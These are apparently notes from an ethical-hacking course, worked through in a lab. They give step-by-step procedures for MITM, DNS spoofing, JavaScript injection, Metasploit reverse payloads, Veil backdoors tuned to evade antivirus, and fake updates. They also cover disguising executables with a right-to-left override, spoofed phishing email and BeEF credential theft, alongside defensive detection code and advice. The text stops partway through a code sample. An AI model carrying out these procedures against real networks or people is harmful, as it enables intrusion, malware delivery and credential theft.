The only way to bypass HSTS is to make the browser think that it is loading a different website. To do this, all HSTS links are replaced with similar-looking links that are not the exact links, for example facebook.com as facebook.corn.
As seen in the previous modules, the bettercap caplets are stored as files in the root directory and can be run automatically.
Run the spoof caplet and, after it executes with no errors, run the hstshijack caplet.
Now the activity done in the host machine will be reflected in the Kali machine. But this is only a partial solution, because it works only when the website name can be changed. Here is a table that will help you understand its features and limitations more clearly.
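Whether the downgrade and look-alike tricks in this and the previous module work depends on how a site sends its Strict-Transport-Security header. The following is an added example in Python, not code from the course notes: it parses that header and reports the weaknesses a site owner should fix. The responses in SAMPLE_RESPONSES are constructed, and the one-year threshold is the value the browser preload list requires.

```python
"""Audit a site's Strict-Transport-Security (HSTS) header.  Added example,
not from the course notes; SAMPLE_RESPONSES below are constructed."""
from __future__ import annotations

from dataclasses import dataclass

ONE_YEAR = 31536000  # max-age (seconds) required for the browser preload list


@dataclass
class HstsPolicy:
    present: bool
    max_age: int | None = None        # None when absent or malformed
    include_subdomains: bool = False
    preload: bool = False


def parse_hsts(header_value: str | None) -> HstsPolicy:
    """Parse the directives of a Strict-Transport-Security header value."""
    if header_value is None:
        return HstsPolicy(present=False)
    policy = HstsPolicy(present=True)
    for directive in header_value.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            try:
                policy.max_age = int(value.strip().strip('"'))
            except ValueError:
                policy.max_age = None  # browsers ignore a header with a bad max-age
        elif name == "includesubdomains":
            policy.include_subdomains = True
        elif name == "preload":
            policy.preload = True
    return policy


def hsts_findings(scheme: str, header_value: str | None) -> list[str]:
    """Return the weaknesses a defender should fix; an empty list means the
    policy resists the downgrade and look-alike-subdomain tricks above."""
    if scheme != "https":
        # browsers ignore HSTS sent over plain HTTP, so nothing else matters
        return ["served over plain HTTP: a MITM can read and rewrite every page"]
    p = parse_hsts(header_value)
    if not p.present:
        return ["no HSTS header: the first visit can be downgraded with sslstrip"]
    findings = []
    if p.max_age is None:
        findings.append("malformed max-age: browsers discard the whole header")
    elif p.max_age == 0:
        findings.append("max-age=0: this clears any stored policy")
    elif p.max_age < ONE_YEAR:
        findings.append(f"max-age {p.max_age}s is under one year; preload needs {ONE_YEAR}")
    if not p.include_subdomains:
        findings.append("includeSubDomains missing: a made-up subdomain can be served over HTTP")
    if not p.preload:
        findings.append("not preloaded: no protection before the first clean HTTPS visit")
    return findings


# Constructed responses (scheme, header) for illustration only.
SAMPLE_RESPONSES = {
    "hardened": ("https", "max-age=63072000; includeSubDomains; preload"),
    "weak": ("https", "max-age=300"),
    "missing": ("https", None),
    "plain": ("http", "max-age=31536000"),
}


def audit_samples() -> dict[str, list[str]]:
    """Run the check over every constructed sample."""
    return {name: hsts_findings(s, h) for name, (s, h) in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    for name, findings in audit_samples().items():
        print(name, "->", findings or ["ok"])
```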
DNS spoofing:
DNS is a service that converts domain names into the IP of the server hosting the website. Let's run a basic DNS spoofing attack, by which we redirect a particular website to our own website. Kali comes with its own web server, which can be used to host the website. To do this, the web server should be started:
service <webservername> start
If there's no error, the server is working. To access the server, we need Kali's IP address: run ifconfig and copy the IP. Open a web browser and paste it there. You will get the default page of the web server. Now run the bettercap command as usual.
The module we need now is dns.spoof; to learn more about it, use the command help dns.spoof
Set the required options of dns.spoof (for example to true) with the command set <option> <value>, and start the module with dns.spoof on
After turning the module on, the domain will be redirected to our website. This works against all websites except HSTS ones.

Injecting code:
So far, we learnt how to intercept data and see the shared images, URLs and passwords. Now, we can modify the HTML code of the pages as they load in the target browser. After capturing the HTML code flowing through our computer, we can insert any piece of code we want. HTML is only responsible for buttons, forms and text on the website and does not allow us to do much. But modern websites allow JavaScript code, and it can be used to replace links and images, insert new elements and more.
Let's run a simple JavaScript snippet to see if it's working. Open a text editor, type a simple piece of code and save the file. For example, code that displays an alert message "javascript test" whenever any website is requested.
Now, open the hstshijack.cap file and add our JS file to the existing JS file in the payload.
Go to the terminal, run bettercap and run the hstshijack plugin; the JS code runs automatically with it.
To check whether it ran successfully, open your browser and visit a website: the JS code we added runs and the alert message pops up.
It works fully on both HTTP and HTTPS websites, and partially on HSTS websites.
Doing everything using a Graphical Interface:
Everything we did so far, we did in the text terminal. But we can also use a web or graphical interface to do everything we did in bettercap. Still, the terminal is faster than the GUI and requires fewer resources and modules, so it is less likely to fail.
Open the terminal and start bettercap without a caplet. Install the web interface.
Copy the IP it prints and open it in your web browser.
The login page of the web interface opens. The default username is user and the password is pass. It opens an easy-to-use interface with the commands.
You can easily do tasks in this interface without the commands.
In the Events tab, all the events and modules are present.
In the LAN tab, all the connected devices are listed with their information, like IP and MAC address, and the options to scan ports and even spoof targets.
In the Caplets tab, all the available caplets of bettercap are present; to run a specific caplet, just double-click it.

Wireshark:
Wireshark is a network protocol analyzer and it is not designed for hackers/hacking. It is designed for administrators to make sure that everything on the network is working properly. It allows you to select an interface and log everything that flows through it. It also allows you to search through packets. It is not a hacking tool; it only lets you capture the traffic that flows through your own computer and interface.
Go to the Kali machine and open Wireshark from the applications menu.
Go to File → Open, open an already captured file and you can analyze it.

Sniffing & analyzing data using Wireshark:
Go to the terminal and run bettercap to become the MITM.
Now, in the Wireshark interface, go to Capture → Options, select the target interface and click Start.
Now all the data flowing through that interface will be captured, including messages, images, cookies etc.
The No. column is the number of the packet.
Time: the time when the packet was captured.
Source: the device the packet was sent from.
Destination: the target computer.
Protocol: protocol type of the packet.
The different colours denote different types of packet:
Green: TCP packets
Dark blue: DNS packets
Light blue: UDP packets
Black: TCP packets that have issues.

Filtering using Wireshark:
To filter only HTTP packets, type http in the filter bar and only the HTTP packets will be shown.
If you double-click a packet, more information on it can be seen. And in the number column, the forward arrow denotes that the request was sent and the backward arrow denotes that the response was received.
Capturing data from the network:
Run Wireshark and, once the capture is done, stop it, search for POST requests and double-click one. There you can see the usernames and passwords sent through that interface. You can also use Ctrl+F to search for what you are looking for, and it will take you to the packet that has it.

Fake access point creation:
In the previous modules, we became the MITM by spoofing the target and the router. But we can also become the access point itself, so that all the devices connected to our network send and request data through our computer. For that, you need a wireless device that broadcasts a wifi signal and invites all neighbouring devices to connect to us.
We need a wireless adapter that supports AP mode, set up so that this system works as an access point. Then we can run any MITM attack easily to capture data. This wireless interface needs to know when a request is sent by the target machine and be able to forward all of it to the right client.
The program we use for the fake access point is a wifi hotspot tool; download and install it on the Kali machine. Open it and you see an interface.
Tick the Open checkbox; this way we can attract many devices.
In the wifi interface field give your wireless adapter name, in the internet interface field give the Kali interface name, and click create hotspot.
Now the fake access point is created. Test it with another VM; do not test it with the host machine, because the VM gets its internet from the host machine.
Now you can use ARP spoofing, sniffing and Wireshark to follow the usual next steps and capture data.
To stop the fake access point, do not close the interface; click the Stop button to stop it properly.
Section 11: Attack detection & security

ARP attack detection:
ARP works on trust: clients accept responses even if they didn't send the request. To check whether you are ARP poisoned, you would have to keep checking whether the MAC addresses in your ARP table have changed. To make this easier, a tool called XArp does it automatically.
Search for XArp in Google and download it on your host machine.
Run it and check the entries.
It shows the devices of the network and the IP and MAC addresses associated with them.
The tool monitors automatically and knows when something changes, because each IP address must have a unique MAC address.
When you run an ARP attack from the Kali machine against your host machine, the tool detects the change and throws an alert message that the MAC address of the device has been changed from an old one to a new one.
With the newly changed MAC address we can find the attacker machine.

Suspicious activity detection:
Apart from XArp, Wireshark can also be used to detect suspicious activity in a network.
Before you start, go to Edit → Preferences → Protocols → ARP, tick the "Detect ARP request storms" checkbox and click OK.
Start the capture by clicking the blue icon in the top-left corner.
Try ARP poisoning from the Kali machine.
Now when we look at the output of Wireshark, it has caught a lot of packets.
From this we can tell that some device is sending a flood of requests to the other devices.
Go to Analyze → Expert Info to see detailed information about the problems.
It shows what is wrong: the errors, the warnings etc.
It means someone is trying to be the MITM using ARP attacks.
Here, some of the ARP entries are static and some are dynamic. A static entry's MAC address cannot be changed, because it is permanently mapped to the relevant address.
Once each IP address is mapped statically to the relevant MAC address, even if someone tries to send a response to change it, the system refuses to change anything, so ARP poisoning attacks will not work against you.
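The two checks this section describes, the XArp-style alert on a changed MAC address and Wireshark's ARP request storm detection, can be written as a small detector over an ARP trace. The following is an added example in Python, not code from the course or from either tool; the trace it scans, and the IP and MAC addresses in it, are constructed.

```python
"""Flag ARP-poisoning symptoms in a trace: an IP whose MAC changes (the
XArp-style check), one MAC answering for several IPs, and an ARP storm (the
Wireshark check).  Added example, not the course's or either tool's code; the
trace, addresses and MACs below are constructed."""
from collections import defaultdict

GATEWAY_MAC = "52:54:00:12:35:00"   # constructed
VICTIM_MAC = "08:00:27:aa:bb:cc"    # constructed
ATTACKER_MAC = "08:00:27:de:ad:01"  # constructed

# Records are (time_ms, opcode, sender_ip, sender_mac, target_ip);
# opcode 1 = request, 2 = reply.  Normal traffic first, then from t=5000 ms a
# burst of unsolicited replies claiming the gateway and the victim in turn.
TRACE = [
    (0, 1, "10.0.2.15", VICTIM_MAC, "10.0.2.1"),
    (100, 2, "10.0.2.1", GATEWAY_MAC, "10.0.2.15"),
    (1000, 1, "10.0.2.1", GATEWAY_MAC, "10.0.2.15"),
    (1100, 2, "10.0.2.15", VICTIM_MAC, "10.0.2.1"),
] + [
    (5000 + i * 50, 2,
     "10.0.2.1" if i % 2 == 0 else "10.0.2.15", ATTACKER_MAC,
     "10.0.2.15" if i % 2 == 0 else "10.0.2.1")
    for i in range(40)
]


def detect_mac_changes(trace):
    """Alerts (time_ms, ip, old_mac, new_mac) when a sender IP shows up with a
    MAC different from the one first learned for it.  Caveat: if the capture
    starts after poisoning began, the 'old' MAC is already the attacker's, so
    compare against a baseline recorded on a known-clean network where possible."""
    learned = {}
    alerts = []
    for t, _op, ip, mac, _target in trace:
        if ip in learned and learned[ip] != mac:
            alerts.append((t, ip, learned[ip], mac))
        learned.setdefault(ip, mac)
    return alerts


def detect_duplicate_claims(trace):
    """MACs that answer for more than one IP: a full-duplex poisoner must claim
    both the router's and the victim's addresses."""
    ips_by_mac = defaultdict(set)
    for _t, op, ip, mac, _target in trace:
        if op == 2:
            ips_by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in ips_by_mac.items() if len(ips) > 1}


def detect_arp_storm(trace, window_ms=1000, threshold=20):
    """(mac, count) for any sender that emits more than `threshold` ARP packets
    inside a sliding window of `window_ms`; normal hosts send a handful."""
    times = defaultdict(list)
    for t, _op, _ip, mac, _target in trace:
        times[mac].append(t)
    storms = []
    for mac, ts in times.items():
        ts.sort()
        start, worst = 0, 0
        for end, t in enumerate(ts):
            while t - ts[start] > window_ms:
                start += 1
            worst = max(worst, end - start + 1)
        if worst > threshold:
            storms.append((mac, worst))
    return storms


if __name__ == "__main__":
    for alert in detect_mac_changes(TRACE)[:3]:
        print("MAC changed:", alert)
    print("multi-IP claims:", detect_duplicate_claims(TRACE))
    print("storms:", detect_arp_storm(TRACE))
```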

MITM attack prevention (type 1)
In the previous modules, we learned only how to detect the attacks. Even when we detect that someone is trying to intercept the connection, we can only disconnect from the network and not do much more. The solution to this issue is to encrypt your traffic. If our traffic is encrypted, even if anyone intercepts it the data will be gibberish and won't be useful.
Go to the terminal and run bettercap.
On the host machine, try to open a website, and it will get reflected in the Kali machine.
To encrypt your traffic, a plugin should be installed. Search for HTTPS Everywhere and add it to your browser.
Turn on the plugin after adding it. The plugin adds HSTS-like behaviour to websites that do not use HSTS. This way your information will be encrypted and hackers won't be able to see it.
This plugin works only for websites that support HTTPS, not for HTTP-only websites. When an HTTP-only website is opened, it is open to hackers.
Also, the plugin won't prevent hackers from seeing which websites you access. Only the data you exchange with the websites is encrypted.

MITM attack prevention (type 2)
To take security to the next level, a Virtual Private Network (VPN) can be used. The VPN creates an encrypted tunnel between our computer and the VPN server, so all the data is sent through this tunnel and nobody can read the data if it is intercepted, because it adds an extra layer of protection.
Pick a reputable VPN from a company that you trust.
Avoid free providers: running a VPN is expensive, so when they provide it for free they may have other intentions.
Choose a VPN that keeps no logs.
You can also use HTTPS Everywhere along with the VPN. This encrypts the data with two layers.
Chapter 2: Gaining Access

In this chapter, we will learn how to gain access to various computer devices. Any electronic device, a laptop, TV, web server, phone, router, website or network, is a computer. All of them have an operating system and programs installed on that OS. The same process is used for all target devices. These devices are going to be attacked in 2 different ways:
1. Server-side: on the server side, we don't need any user interaction. This applies to web servers and applications that are not used directly by people.
2. Client-side: on the client side, user interaction is required, and it is applicable to all devices.

Section 12: Server-side attacks

Metasploitable as a virtual machine:
To do server-side attacks, we need a machine that acts as a server. The machine that is going to be used is Metasploitable, a deliberately vulnerable Linux virtual machine that contains many services and applications used by servers.
https://sourceforge.net/projects/metasploitable/
Open the link and download it.
Uncompress and extract the file.
Once that is done, open VMware and open the downloaded file as a virtual machine.
A command prompt opens, runs some startup scripts and asks for a login. The defaults are username: msfadmin ; password: msfadmin
Now you are logged in to the virtual machine.

Server-side attacks:
These are attacks that don't require user interaction. They can be used against servers and web servers, and they can also be used against normal computers. When you target a server with its IP address, you can reach it directly over the internet. For a normal computer, this way of information gathering works only if the device is on the same network. If you can ping a device, you can run all the attacks and all the information-gathering methods against it. Here, we are targeting our Metasploitable virtual machine.
Open the Metasploitable virtual machine, run ifconfig and find its IP address.
Now open your Kali machine and ping the IP address of the Metasploitable virtual machine.
We get responses back from the machine, and now we can test its security.
These attacks can be run against any computer as long as you can ping it.

Information gathering and exploitation:
The first step of server-side attacks is information gathering; it reveals important information like the operating system, installed programs, running programs and open ports of the target machine.
Open the Kali machine and run zenmap.
In the target text box, paste the IP of the Metasploitable virtual machine and scan.
It gives the list of all running services.
Check the services on the open ports and look up their known vulnerabilities.
These can be used to gain access to the target machine.
Remote server hacking using a metasploit exploit:
Some programs or services ship with backdoors embedded in them, and we can exploit them with a framework called Metasploit.
Using Nmap, find the open ports and search for exploits for their services.
Metasploit is an exploit development and execution tool. It is made by Rapid7 and is a huge framework that contains many exploits and allows the exploitation of vulnerabilities.
Here are a few basic commands that will help you move forward:
Now, to configure Metasploit with the target machine's IP address, the following commands are used.
To get access to the target computer, run the exploit.

Code execution vulnerability exploitation:
Open the terminal and type the command use <name of the exploit you want to use>, then run show options to see what you can change in the exploit.
To set RHOST to the target machine, run the set command.
In the previous module, we used a backdoor to connect to the target machine and run commands.
Here we are going to exploit a normal program that has a buffer overflow.
The program doesn't have any code of ours to run, but it has a flaw that lets it run a small piece of code called the payload.
To see the payloads, use the command show payloads, which lists the different types of payloads that can be used.
There are two types of payloads, bind and reverse. A bind payload opens a port on the target machine and we connect to it. A reverse payload opens a port on our machine and the target computer connects back to it.
Reverse payloads allow us to bypass firewalls.
Run the set payload command, set RHOST to the target's IP address and LHOST to your IP address, and run the exploit.

Nexpose installation:
Nexpose is an enterprise vulnerability management tool made by Rapid7, mostly used in large companies.
It is designed to cover the whole vulnerability management cycle: it can discover open ports and running services, find exploits and more.
Download Nexpose and install it.
Open the terminal and find the downloaded file with the command ls.
The file is a binary installer, so before running it must be made executable.
To do that: chmod +x <filename>
Now the file name is shown in green, which means the file is executable.
To run the file: ./<filename>
It opens an installation window. Install it.
Once the program is installed it starts automatically; stop the auto-start.
Nexpose will not be started automatically after this.
Now, to start it manually, go to the location where it is installed.
Run the nexpose script file with ./<filename>
Starting Nexpose can take 30 to 40 minutes, so be patient.
After it starts, click on the link given in the installation message. It opens in the browser.
Log in with the same credentials you used while installing.
It asks for the product activation key; you can find it in the email you received after registration.
Now the framework is ready to use.
Scanning a target server using Nexpose:
First create a target in the framework. Go to Create Site and fill in the details.
In the Assets tab, enter the target IP address and add it to the group.
In the Authentication tab, select the domain and enter your username and password.
In the templates, use the default, "Full audit without Web Spider", because it scans ICMP, TCP and UDP ports. Start the scan.

Analyzing scan results and report generation:
The details of the target machine will be in the asset report.
The OS, installed software and services, and all other information are found in this framework.
If you click on any service, it gives more information, like the port numbers.
The vulnerabilities are analyzed and reported in chart form.
To learn more about a vulnerability, double-click it. It also shows references and solutions for how to fix this vulnerability.
You can also create a report with different templates for different purposes in the Reports tab.
Reports, scans and analyses can also be scheduled.
To make a server-side attack successful, remember the following key points:
1. Discover the open ports and running services on the target machine.
2. Find the vulnerabilities and exploits and verify them.
3. Make a report of it.

Section 13: Client-side attacks

Most of the time it is best to try server-side attacks first; if they do not work, move to client-side attacks. A client-side attack needs user interaction: the target has to open a link, install an update, open an image and so on, and when they do, our code runs and we gain access. Because it depends on user interaction, information gathering is very important, and it focuses on the person rather than on the operating system.
Veil framework:
A backdoor is a file that, when executed on the target machine, gives us full access. Plain backdoors are caught by anti-virus programs, so a framework called Veil is used to generate backdoors that evade detection.
https://github.com/Veil-Framework/Veil
Download the framework and configure it.
Open the terminal and navigate to the downloaded location.
Make the setup script executable (chmod +x) and run it.
During installation there are many prompts in the terminal; accept the defaults and answer yes to all of them.
After the installation, typing the program name, veil, in the terminal runs it without any error.

Basics of Veil and payloads:
Veil has two important tools, Evasion and Ordnance. Evasion generates the backdoor files, and Ordnance generates the shellcode (the payload) that Evasion embeds in them.
To run Evasion, select it from the Veil menu (use Evasion). As it starts, the available commands and modules are displayed.
Use the list command to see all the available payloads.

Each payload name has three parts. The first is the language the backdoor is written in (for example go or python), the second is the type of payload (for example meterpreter), and the third is the method used to establish the connection (for example rev_https).
Undetectable backdoor generation:
In Evasion, list the payloads.
The payload go/meterpreter/rev_https should be used, so type: use [number of the payload]

Now the LHOST option must be set to the IP address of the Kali machine, because the backdoor connects back from the target to the Kali machine.
To change it: set LHOST [IP address]

To make the backdoor look different from the default output, set the PROCESSORS option to 1, the SLEEP option to 6 and the LPORT option to 8080.
Run the options command again and check that everything has changed.
To generate the backdoor, use the command: generate
It asks for a name for the backdoor; give it a name.
Copy the path of the generated file and check it with a scanning service such as NoDistribute to see whether it bypasses anti-virus programs (avoid scanners that share samples with anti-virus vendors, or the backdoor will be flagged soon after).
Most of the time it will not bypass all of them, so use the latest version of Veil and experiment with different payloads and option values until one works.

Incoming connections:
The backdoor we created uses a reverse payload, which means it does not open a port on the target; instead the target connects out to our computer.
For this to work, a port has to be open and listening on our computer.
Run the Metasploit framework (msfconsole) to listen for incoming connections.
To listen, we use the generic handler module: use exploit/multi/handler

Then run the options command to see the options of this module.
Change the payload option to the HTTPS reverse payload: set payload windows/meterpreter/reverse_https
This payload must correspond to the payload used in the backdoor.
Remember: the payload, LHOST and LPORT must be exactly the same as in the backdoor.
After setting them, run exploit; Metasploit waits for connections on the given IP and port until it gets one.

Backdoor testing:
To test the backdoor and make sure it works, run it on the practice target machine.
Copy the backdoor file into the directory the web server serves files from (on Kali, /var/www/html).
Start the web server so the Kali machine can serve the file:
service [name of the web server] start (on Kali, apache2)
Now open a browser on the Windows machine and browse to the IP of the Kali machine. The default web server page opens.
Browse to [Kali IP]/[filename] to reach the backdoor file.
Download and run the file.
Back on the Kali machine, a new connection appears in the handler.

The IP of the target machine is shown, and we now have full control of the machine.
Run sysinfo to see details of the machine.

Fake update hacking:
In this module we create a fake update for a program on the target machine and gain access through it. For this you must be the man in the middle (MITM), which can be done by ARP spoofing or by running a fake access point.
On the Kali machine, navigate to the directory where the evilgrade framework is saved.
Run evilgrade and use show modules to list the programs it can impersonate.
Configure the module for the program you want to fake: configure [modulename]

Inside the module (the example uses the dap module), run show options.
Set the agent option to the path of the backdoor; this is the file served as the "update".

Next, set the endsite option: it is the website loaded after the update runs, so the user sees something normal.

Start evilgrade; it waits for update requests.
We are not the MITM yet, so open another terminal, run bettercap and configure DNS spoofing for the update domain used by the module, so the target's update check resolves to the Kali machine.
In a third terminal, listen for incoming connections with the Metasploit handler, as before.
When the Windows machine installs the fake update, the backdoor runs and we gain full access to the target machine.

Backdoor downloads hacking:
In this method the target downloads a legitimate executable, and while it downloads we inject a backdoor into it on the fly, so the program still works but the backdoor also runs and gives us access. A tool called Backdoor Factory Proxy (BDFProxy) is used.
Go to the directory where the tool is installed and open its configuration file.
In the configuration file, change the proxy mode from regular to transparent, and change the host IP to the IP of the Kali machine.
Open a terminal, navigate to the tool's directory and run it.
Now requests must be redirected to it, so you have to be the MITM: run the usual ARP spoofing commands.
Then redirect the intercepted HTTP traffic to the port BDFProxy listens on (an iptables NAT redirect rule).

Listen for incoming connections with the Metasploit handler.

When the downloaded file is run, the backdoor connects back and a new session appears on the Kali machine.

Protection against server and client-side attacks:
Make sure you are not being MITM'ed: use networks you trust and run a tool such as XArp to detect ARP spoofing.
Use and download only from HTTPS pages.
Verify downloads against the checksum published by the vendor: compute the hash of the file you downloaded (md5sum, or better sha256sum, since MD5 collisions are practical) and compare it with the published value; a mismatch means the file was modified or tampered with in transit.
Section 14: Social Engineering

The client-side attacks work well, but their one limitation is that the hacker has to be the MITM. In this section we look at social engineering methods that do not require being the MITM. Gathering more information on the user lets us build a strategy, and a backdoor, tailored to that information.

Basics of Maltego:
Maltego is an information-gathering tool whose target can be a website, a person, a computer or almost anything. It discovers the entities associated with the target and displays them on a graph.
Download and install the tool.
Log in with your user credentials and the tool interface opens.
Click the top-left icon to open a new graph.

From the entity palette on the left you can drag any entity onto the workspace to gather information about it.
Maltego has a free edition, but the paid version has many more transforms and no result limits, so start a free trial of the paid version to have access to those features.

Discovering websites & social accounts:
Start a new graph and, from the entity palette, select the Person entity and drag it onto the workspace.
Enter the full name of the target in the property list in the right-hand tab.
To gather information about the person, right-click the entity, look at the transforms available and select the one you need, e.g. websites.
It draws a graph of websites associated with that name.
These websites do not necessarily belong to the target; someone else may have the same name. Go through all of them and work out which ones are really related to your target.
Double-clicking a website opens a window; under Properties you can see its URL. Copy the URL and open it in the browser.

Discovering friends through the target's social media accounts:
Go to the Twitter account of the target person.
Add a Twitter entity to the workspace. The palette only shows a Tweet entity by default, so go to Entities → Manage Entities and add the entities you need to the palette.
Drag and drop the entity and enter the account URL in the property tab.
Look for the people the target interacts with on the account; we can gather more information about them.

Discovering friends through the target's email:
Add an Email Address entity to the workspace and enter the email address in the property tab.
Right-click it and select the transform for the information you need.
Select the email addresses associated with the same domain as the email.
These methods are trial and error. Try as many transforms as it takes to get useful information.

Analyzing the gathered information:
Arrange the gathered information in a way that is easy to analyze.
With this information we can pretend to be one of these people and send the target programs to run, gaining access.
You can also try to compromise one of the friends' devices or accounts first and use it to deliver a backdoor to the target.

Backdooring with different types of files:
The backdoor can be combined with any type of file: images, videos, songs or anything else. This way we can socially engineer the target into running the backdoor through something they are interested in. This is done with a download-and-execute script (an AutoIt script that downloads the listed URLs, opens the decoy file and silently runs the backdoor).
Double-click the script file to open it.
In the URLs line, paste the URL of the image you want the target to see, then a comma, then the URL of the backdoor file.

Always use direct URLs (links that return the file itself, not a download page).

Trojan compiling:
The script has to be compiled into an executable before it can be used.
First change the extension of the file from .txt to .au3.
Go to All Programs → AutoIt → Compile Script to .exe.
Browse to and open the script file. You can also change the icon of the resulting file; then click Convert.
Now start the handler for incoming connections and run exploit.
Wait for the connection; once it is received you have access.

Extension spoofing:
When the backdoor is combined with an image, the downloaded file still ends in .exe.
So we spoof the extension so that the name appears to end in the extension we want.
This is done with the right-to-left override character (a Unicode control character); a "right to left" converter tool gives you the character to paste into the filename.
Everything after that character is displayed reversed, right to left.
E.g., the current filename is gtr.exe
Write the extension you want it to appear with, reversed, before the real extension.
If it should look like a .jpg:
gtrgpj.exe
Copy the override character from the tool and insert it before the reversed extension:
gtr[override character]gpj.exe
The character itself is invisible, but once it is inserted, the part after it is displayed right to left and the name shows as gtrexe.jpg, even though the file is still an .exe.
Rename the file to this name.
Do not send the file as it is, because browsers and mail clients sometimes strip the right-to-left override; compress it into an archive first.
This method can be used to make the file look like any type of file.
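The override trick above, as an added example that is not part of the original notes: the code builds the spoofed name exactly as described, simulates how a bidi-aware file manager displays it, and shows the check a mail gateway or endpoint agent can run to catch such names. Function names and the sample filename are mine.

```python
# Added example, not part of the original notes: builds a filename with the
# right-to-left override (RLO, U+202E) as described above, simulates how a
# bidi-aware file manager displays it, and shows the check a mail gateway or
# endpoint agent can run to catch it. Function names are mine.
import unicodedata

RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE: characters after it render reversed

# Unicode bidirectional control characters; none of them belong in a filename
BIDI_CONTROLS = frozenset(
    ["\u202a", "\u202b", "\u202c", "\u202d", "\u202e",   # embeddings, overrides
     "\u2066", "\u2067", "\u2068", "\u2069",             # isolates
     "\u200e", "\u200f"]                                 # LRM / RLM marks
)


def spoof_extension(real_name: str, fake_ext: str) -> str:
    """gtr.exe + 'jpg' -> 'gtr' + RLO + 'gpj.exe', which displays as gtrexe.jpg."""
    stem, _, real_ext = real_name.rpartition(".")
    visible_tail = f"{real_ext}.{fake_ext}"      # what the victim should see: "exe.jpg"
    return stem + RLO + visible_tail[::-1]       # stored reversed: "gpj.exe"


def displayed_name(stored_name: str) -> str:
    """Approximate what the file manager shows: the part after RLO, reversed."""
    head, sep, tail = stored_name.partition(RLO)
    return head + tail[::-1] if sep else stored_name


def real_extension(stored_name: str) -> str:
    """The extension the OS actually uses: drop bidi controls, take the last suffix."""
    cleaned = "".join(ch for ch in stored_name if ch not in BIDI_CONTROLS)
    return cleaned.rpartition(".")[2].lower()


def is_suspicious(stored_name: str) -> bool:
    """Flag any filename carrying a bidi control or other format (Cf) character."""
    return any(ch in BIDI_CONTROLS or unicodedata.category(ch) == "Cf"
               for ch in stored_name)


if __name__ == "__main__":
    name = spoof_extension("gtr.exe", "jpg")
    print(repr(name), "is shown as", displayed_name(name),
          "but its real extension is", real_extension(name),
          "; flagged:", is_suspicious(name))
```

The defensive check is the useful half: a filename that contains any bidirectional control character has no legitimate reason to, so rejecting or quarantining such attachments catches this trick regardless of which extension is being faked.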

Email spoofing (type 1):
Trojan backdoors can be delivered to the target in many ways, and this is where information gathering plays a vital role.
With the gathered information you can pretend to be a friend, a company, the boss or anyone the target knows.
Searching Google for "spoof emails online" finds services that do this.
The problem with these services is that the email usually lands in spam, not the inbox.
To get around this, use an SMTP relay service: search for a free SMTP server and sign up.
After signing up, verify your email address.
To send the email we use a program called sendemail.
On the Kali machine, run sendemail --help to see its options.
The SMTP username, password and server are given like this:
sendemail -xu [username] -xp [password] -s [server]:[port]
The username and password are found in the transactional (SMTP) tab of the service.

This is similar to logging in to Gmail. Now, to send the email:
sendemail -xu [username] -xp [password] -s [server]:[port] -f [sender email] -t [target email] -u [subject] -m "[message body, including the direct link to the backdoor file, e.g. a Dropbox link]"
An email sent this way shows only the sender's address, not a display name. To add one, append to the previous command:
-o message-header="From: Name <sender email>"

The email arrives in the target's inbox. This method works regardless of the target's OS.
Email spoofing (type 2):
Another way to spoof email is through a web hosting account, a service that lets us host a site on the internet.
Choose the cheapest web hosting provider and sign up.
After signing up, go to the management tab; the website takes some time to be set up.
Once it is set up, you can open it.
But first, a few settings of the website must be managed.
Click the manage icon and open the directory called public_html (or the directory named after your login).
Files must be uploaded into that directory only.
Upload the mailer script there, open the website and append /filename to the site URL to open it.
Now you can send emails to the target from this simple web GUI, with whatever sender name and address you type.
Hook method and BeEF basics:
BeEF, the Browser Exploitation Framework, lets us launch a number of attacks against a hooked browser at the same time, in the easiest way.
On the Kali machine, click the beef start application.
On first login it asks you to set a password for the default user.

It then starts BeEF and opens Firefox on the BeEF web interface.

Log in with the default username, beef, and your password.
BeEF works through JavaScript, so it runs in any browser with JavaScript enabled, on any device.
To hook a website to BeEF, put the hook script shown in the start-up message in the terminal into the page's HTML, replacing the IP address in its src attribute with the Kali machine's IP.
When the target loads the page, their browser is hooked: it appears in the BeEF interface and you can run browser commands against it.
When you are done with BeEF, select the beef stop application on the Kali machine to stop it.

Basic commands of BeEF:
Now that a browser is hooked, we can run commands on it.
In the Commands tab there are many commands of different types.
Let's try a simple one: an alert message.
Search for "alert", select Create Alert Dialog, type your message in the alert text box and click Execute.

On the target's browser an alert message pops up.
To take a screenshot of the hooked page as the target sees it, search for "spyder eye" under the Spy category and click Execute.
Click the command in the history tab to see the screenshot.
There are numerous commands; experiment with them.

Fake login hacking:
A social engineering command lets us capture usernames and passwords.
When it runs, it dims the target's page and shows a dialog saying they have been logged out and must log in again.
Because the dialog is drawn by the hook script inside the already-loaded page, HTTPS and HSTS do not protect against it.
Under the Social Engineering category select Pretty Theft, fill in the needed details and execute.
When the target enters their credentials, they are shown in the command's results.

Fake update hacking:
To gain access through a fake update, select the Fake Notification Bar command; it shows the target a bar offering a new update.
Enter the address of your backdoor file in the plugin URL box and execute.
Run the usual handler for incoming connections to gain access to the target machine when the "update" is run.
Trojan detection:
A trojan may bypass anti-virus programs, and it runs two things at once: the decoy (image, document, update) and the backdoor.
To check a file, take the picture we downloaded as a trojan, right-click it and go to Properties.
In Properties the real extension of the file can be seen, even when the displayed name was spoofed.
To find a running trojan, open Resource Monitor and go to the Network tab; it shows the open ports and connections of your device.
If a suspicious IP is connected to one of your ports, copy it and search for it on Google. If it belongs to a known website there is no worry; if not, it may be the IP of an attacker.
You can also use a reverse DNS lookup site to find the hostname of the suspicious IP.
A sandbox can also be used to find trojans: Google "hybrid analysis", select your file and upload it.
The service runs the file in sandbox environments and reports whether it does anything suspicious.
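The Network-tab check above, done from the command line, as an added example that is not part of the original notes: it parses the connection table (the format of netstat -ano on Windows; ss -tunap on Linux gives similar columns), drops peers on local and private ranges, and reports the processes talking to outside addresses on ports that are not ordinary web ports, which is exactly what a reverse connection on 8080 looks like. The netstat lines are constructed sample data, not captured from a real machine, and the function names are mine.

```python
# Added example, not part of the original notes: parse a netstat -ano style
# connection table and flag established connections to external hosts on
# non-web ports. SAMPLE_NETSTAT is constructed sample data.
from __future__ import annotations

import ipaddress
from dataclasses import dataclass

SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
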